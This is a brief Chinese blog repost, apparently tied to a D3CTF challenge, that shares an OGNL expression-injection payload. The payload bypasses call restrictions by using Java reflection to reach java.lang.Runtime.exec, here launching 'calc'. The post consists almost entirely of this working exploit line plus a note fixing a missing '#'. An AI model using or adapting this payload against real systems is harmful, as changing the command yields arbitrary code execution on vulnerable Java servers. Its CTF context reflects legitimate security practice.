绕过OGNL调用限制的Payload
2022-04-19 本文已影响0人
fatshi
【转】 http://example.com/2022/04/11/D3CTF/
这个博主写少了一个#,应该在this之前添加#
(#cls = #this.getClass().forName('java.lang.Runtime')).(#rt=#cls.getDeclaredMethod('getRuntime',null).invoke()).(#exec=#cls.getDeclaredMethod('exec', #this.getClass().forName('[Ljava.lang.String;'))).(#exec.invoke(#rt,'calc'.split(',')))
